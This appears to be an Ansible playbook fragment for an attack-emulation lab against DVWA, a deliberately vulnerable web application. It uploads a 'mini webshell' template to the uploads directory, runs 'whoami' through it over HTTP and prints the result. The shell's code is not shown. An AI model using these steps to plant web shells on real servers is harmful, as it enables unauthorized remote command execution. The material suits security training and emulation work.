---
- name: Initial Access - Upload mini webshell
  template:
    src: webshell.php.j2
    dest: /var/www/html/DVWA/hackable/uploads/shell.php
    mode: '0644'
  delegate_to: "{{ groups['web-victim'][0] }}"

- name: Initial Access - Test access to uploaded webshell
  uri:
    url: "http://{{ web_victim_ip }}/DVWA/hackable/uploads/shell.php?cmd=whoami"
    return_content: yes
  register: shell_output
  failed_when: false

- name: Show webshell execution result
  debug:
    var: shell_output.content
